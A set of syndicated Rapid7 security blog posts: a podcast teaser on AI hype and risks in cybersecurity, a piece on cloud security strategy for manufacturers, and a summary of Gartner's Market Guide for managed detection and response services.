Everybody knows an early version of Bing AI spawned a weird personality named “Sydney” and expressed the desire to be both human and destructive. Then there’s that “AI pause” letter almost everybody signed. And now this, from the New York Times: the godfather of AI, Geoffrey Hinton, 75, is leaving Google. He wants to speak freely about the grave dangers he predicts: “It is hard to see how you can prevent the bad actors from using it for bad things.”

A part of him, Hinton said, has come to regret his life’s work.

According to Wired, security researchers are “jailbreaking large language models to get around safety rules.” Our life’s work? Yours? It’s more important than ever. We just might save humanity. But that’s for later…

Separating real and hype about AI and cybersecurity

Rapid7 Detection and Response Practice Advisor Jeffrey Gardner and Stephen Davis, Lead Technical Customer Advisor for MDR, may get profound in the future, but this episode is 100% practical and useful right now.

Around the 5:00 mark, they go through exactly how AI is being used in cybersecurity today (and not used, no matter what you hear).

And around the 7:00 mark, heed Gardner’s passionate warning about what you and all your company staff need to think about every time you engage with an AI tool. Every time. In any way. Seriously. Gardner and Davis are funny, but this warning sure isn’t.

Cloud Security Strategies for Manufacturing

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/05/03/cloud-security-strategies-for-manufacturing/

Protecting production while supporting growing cloud initiatives

Cloud Security Strategies for Manufacturing

The manufacturing industry is in limbo as organizations shift to cloud services. Many organizations are transitioning services to the cloud, but the vast majority maintain hybrid network environments that lean heavily on on-prem elements. During the pandemic, some companies were forced to expand their cloud services quickly to keep up with an influx of end users accessing network services remotely. However, few manufacturers are really pursuing a cloud-first approach.

This leaves most manufacturing organizations struggling to address issues of visibility in their hybrid cloud environments. There’s also a growing concern about compliance in the industry, with manufacturers setting internal standards to provide crucial oversight for themselves and their third-party partners. All of this is occurring during an industry-wide push to implement smart factory initiatives and a persistent IT/OT skills gap in manufacturing organizations.

An effective cloud security strategy is key for manufacturing companies. As they transition their services, implementing cloud security will ensure they’re able to monitor their growing attack surfaces, establish the necessary auditing processes and assessments for compliance, and support smart factory initiatives.

Major challenges of cloud security in manufacturing

Ensuring consistent production is paramount for manufacturing organizations. Cloud security strategy for this industry enables hybrid networks to function without disruption, while still supporting developing compliance regulations and smart factory initiatives. Without an effective cloud security strategy, manufacturers jeopardize their entire hybrid network as well as the operational elements and software integral to their manufacturing processes. Let’s look at a few of the obstacles keeping manufacturers from implementing an effective cloud security strategy.

Lack of visibility into the cloud

The manufacturing industry is unique in that organizations are not only monitoring an environment populated with their own cloud and on-prem elements, but they’re also tasked with tracking the elements of the third-party vendors that they partner with. These additional endpoints increase the overall attack surface and can be tricky to secure.

Lack of visibility into the cloud applications and elements in a manufacturing company’s network impacts root-cause analysis, anomaly detection, and the other processes that affect availability, performance, and security across the entire network.

Network disruptions often translate to supply chain issues that can affect production and availability. This ultimately translates to lost revenue and negatively impacts a manufacturer’s brand reputation. In fact, in a Supply Chain Resilience Report, 16.7% of business owners reported a “severe loss of income” due to a supply chain disruption. The report also revealed that the average cost of a disruption was around $610,000. Cloud security strategy, then, should include visibility across the entire infrastructure as well as third-party dependencies, and the context needed to make third-party risk clear.

Failure to achieve and maintain cloud compliance

Unlike highly regulated industries such as healthcare and financial services, manufacturing organizations don’t have much external guidance when it comes to cloud compliance. In the absence of government regulation, manufacturing companies need their own way to validate network configurations and changes in their cloud applications and infrastructure.

The lack of compliance standards for cloud applications prevents many manufacturers from properly deploying cloud-controlled elements, as well as detecting and remediating issues. This leads to system-wide vulnerabilities and greater exposure in the threat landscape. For example, without proper compliance standards in place, an organization may let security patching lapse in its cloud environments, or fail to enforce the service-level agreements (SLAs) that require it, leaving gaps that threat actors can exploit.

Manufacturing organizations require a cloud security strategy that includes automated detection and remediation assistance, as well as support in adopting and implementing the limited guidance that is available, such as the frameworks published by the National Institute of Standards and Technology (NIST).

Inability to bridge the IT/OT knowledge gap

According to a Gartner survey, 64% of IT executives view talent shortages as the most significant barrier to adoption of emerging technologies. In the manufacturing industry, this translates specifically to a lack of IT/OT specialist knowledge on network teams.

IT/OT refers to the integration of information technology (IT) systems with operational technology (OT) systems. This particular combination of systems is used by manufacturing organizations to balance cloud network infrastructure that controls information and data with industrial equipment, assets, and processes.

Without specialist knowledge of these systems and how they interact, manufacturers struggle with IT and OT silos that lead to system disruption, downtime, and increased vulnerability. Manufacturers often assume that because OT systems are critical to production, they must also be the main source of risk in the infrastructure. In practice, IT systems are more often the point of entry: an IT compromise may look small, but it carries a much larger risk because IT networks connect to the OT systems that run production. To combat this, manufacturers need a toolkit that will fill this skill gap on their teams, automate processes for increased efficiency, and consolidate data to break down silos between teams.

Where to start with a cloud security strategy in manufacturing

When looking to build a strong cloud security strategy, manufacturers should focus their efforts in the following areas:

  • Visibility
  • Compliance
  • Managed Services

Prioritize cloud visibility

Though the transition to cloud services is slower in the manufacturing industry, it is still an inevitability. Consequently, the best way for manufacturing organizations to adequately protect their cloud infrastructure, and by extension their overall environment, is to focus on visibility.

Visibility reduces risk and allows companies to effectively monitor their attack surfaces. This begins with manufacturers collecting monitoring data from across their cloud infrastructure. Drawing connections between the data, end-user experiences, and supply chain interaction can help manufacturers find weak or vulnerable points in their cloud infrastructure.

The right cloud security tools will help teams continuously monitor both public cloud and container environments. Manufacturers also need real-time visibility and context to find and fix issues quickly. InsightCloudSec offers all of these features and more to manufacturing companies—effectively eliminating network blind spots and giving teams the confidence they need to move forward with their cloud initiatives.

Consider cloud compliance solutions

Many manufacturers struggle with finding and adopting regulatory best practices in their cloud environments. While NIST offers guidance on network security, and the Center for Internet Security (CIS) offers frameworks and CIS Benchmarks, many manufacturers are unsure of which guidelines make the most sense for their organization’s needs. Moreover, manufacturers need guidance on how to implement compliance monitoring, which ensures that their cloud elements are operating securely.

Without compliance, manufacturers are essentially managing their cloud environments in the dark, with little governance on how to deploy applications, configure their cloud environments, and update their elements. This can lead to lapsed security updates and serious vulnerabilities that increase risk across the entire infrastructure.

Enter cloud compliance solutions. These tools can enable manufacturing organizations to automate compliance monitoring and management. For example, InsightCloudSec checks an organization’s multi-cloud environments against dozens of industry and regulatory best practices. Moreover, cloud compliance solutions enable manufacturers to customize external compliance checks to sync with internal compliance regulations. This eliminates frustration and false alarms.

Teams can also take advantage of InsightCloudSec’s embedded automation, which automatically detects compliance drift and returns cloud environments to a secure state within 60 seconds.

Outsource with managed services

Manufacturing teams struggling to hire and retain skilled IT workers often find themselves with a gap in IT/OT oversight. This gap can result in greater silos between IT and OT teams, which can disrupt smart factory initiatives and the adoption of cloud services, and lead to increased unchecked system vulnerabilities.

After all, it’s hard to contextualize risk without a complete understanding of IT/OT cloud elements and how risk in one arena affects the other. Instead of an organization redoubling their hiring efforts or overwhelming their existing team members, managed services allow manufacturers to effectively outsource this role and add a virtual IT/OT specialist to their team.

Rapid7’s managed services team offers regular assessments, handles the operational requirements of incident detection and response, and performs vulnerability scanning. This frees up crucial time for IT/OT teams and streamlines the scanning and reporting process, which encourages greater collaboration. Contextualization, or the process of analyzing threats and gathering relevant supplemental information, is simple with Rapid7’s InsightVM. InsightVM works in partnership with SCADAfence to assess vulnerabilities and leverage insight into OT networks to accurately prioritize risk.

The bottom line

Establishing cloud security strategies in manufacturing organizations often seems like an insurmountable task. Common struggles of visibility, compliance, and IT/OT knowledge gaps plague manufacturing companies who are transitioning to cloud services. This can lead to network blind spots, slowdowns, and increased risk.

Building a toolkit of cloud security solutions can help manufacturers reduce their overall risk in the cloud and optimize their performance by improving internal compliance. Making the most of this toolkit requires specialized knowledge, but leveraging managed services enables manufacturing organizations to streamline reporting and assessments without hiring additional in-house staff.

Manufacturing organizations are evolving to keep up with production demands, changing technology, and an ever-broadening threat landscape. By strengthening cloud security, manufacturing companies can focus on providing a superb product, assured that their cloud environment is secure. Get in touch with us to learn more about how Rapid7 is helping manufacturing companies navigate security during every phase of the cloud transition process.

Three Takeaways from the Gartner® Market Guide for Managed Detection and Response Services

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2023/05/02/three-takeaways-from-the-gartner-r-market-guide-for-managed-detection-and-response-services/

Three Takeaways from the Gartner® Market Guide for Managed Detection and Response Services

Not all MDR services are created equal, and in order for organizations to find the right partner for their managed detection and response needs, Gartner® has published a Market Guide report offering key insights for businesses of all sizes. At Rapid7, we are proud to offer this complimentary report and share our three key takeaways from it.

MDR services have skyrocketed over the past few years. In the report, Gartner says: “MDR is a high-growth, established market (see Market Share: Managed Security Services, Worldwide, 2021 where MDR is a distinct segment, the MDR market grew 48.9% from 2020 to 2021).”

Because of the high growth in the market, many managed security services use the term MDR. However, organizations looking for a true Managed Detection and Response partner, should look to the Gartner definition to identify the right vendor.

Gartner puts it this way: “MDR services provide customers with remotely delivered, human-led, turnkey, modern SOC functions; ultimately delivering threat disruption and containment.”

But choosing a strong MDR partner goes far beyond these high-level requirements. Below are our key takeaways from the report. Without further ado, let’s dive right in.

Takeaway 1: Beware Providers Mimicking MDR

The key to MDR lies as much in the human-centric nature of the service as in the power of the technology behind it. Managed Detection and Response is just that… managed. It requires a human with expertise not only in detecting and remediating threats and breaches, but also in understanding how those threats relate to your business and its goals. Sadly, not all services claiming to be MDR lead with this human expertise.

Gartner shares: “Misnamed technology-centric offerings and vendor-delivered service wrappers (VDSW), that fail to deliver human-driven managed detection and response (MDR) services, are causing challenges for buyers looking to identify and select an outcome-driven provider.”

Human-analyzed context is critically important to the success of an MDR program and an organization’s outcomes in their security programs. Unfortunately, some providers are not living up to their own marketing materials. For instance, Gartner found that some “deliver a far less human-driven experience, depending on the technology for the bulk of the delivery. Although still valuable, these offerings are often promoted as being more engaged than they actually are and would be better described as managed EDR (MEDR).”

Takeaway 2: Context is King

This could be considered a corollary to the previous takeaway, but it deserves its own entry: an MDR provider must understand your organization’s unique environment, the context of threats, and how those threats have the potential to impact your business. It is not enough to simply detect and remediate threats; an MDR SOC should understand which threats and types of threats will have the biggest impact on your company or organization.

The human-led nature of successful MDR programs means that a company can rest assured that their MDR SOC is able to provide insights that are actually useful to boost their customer’s outcomes.

Gartner has this to say on the subject: “MDR buyers must focus on the ability to provide context-driven insights that will directly impact their business objectives, as wide-scale collection of telemetry and automated analysis are insufficient when facing uncommon threats.”

We feel this has a direct relationship with the expertise of the MDR provider and the quality of the technology they are providing. Too much information without the context necessary to triage and prioritize could overwhelm any security team. Too little information and threats go unchecked. Finding the right balance between the tech and expertise is critical.

Takeaway 3: Threats Know No Boundaries

Ok, that subhead may be a little hyperbolic, but it should surprise no one that threat actors aren’t clocking out at 5pm on a Friday and taking holidays off. Your MDR SOC can’t either. Gartner recommends: “Use MDR services to obtain 24/7, remotely delivered, human-led security operations capabilities when there are no existing internal capabilities, or when the organization needs to accelerate or augment existing security operations capabilities.”

So, what exactly does that mean? Essentially, any MDR SOC you choose should provide round-the-clock security that knows no geographical limitations, and has a team of experts actively detecting, assessing, and providing remediation recommendations for threats whenever they arise.

Gartner says: “Turnkey threat detection, investigation and response (TDIR) capabilities are a core requirement for buyers of MDR services who demand remotely delivered services deployed quickly and predictably.”

A follow-the-sun approach that puts highly competent security experts at your fingertips 24/7, 365, and that melds the human-centric nature of deep cybersecurity and business analysis with a powerful threat-detecting technology solution would make for a compelling MDR service option.

Choosing an MDR partner requires some serious due diligence and understanding of your organization’s priorities. This Market Guide helps MDR buyers understand the state of the market and what to look for in an effective MDR provider. Our three takeaways are in no way comprehensive; download the full report to learn more.

Gartner, “Market Guide for Managed Detection and Response Services” Pete Shoard, Al Price, Mitchell Schneider, Craig Lawson, Andrew Davies. 14 February 2023.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.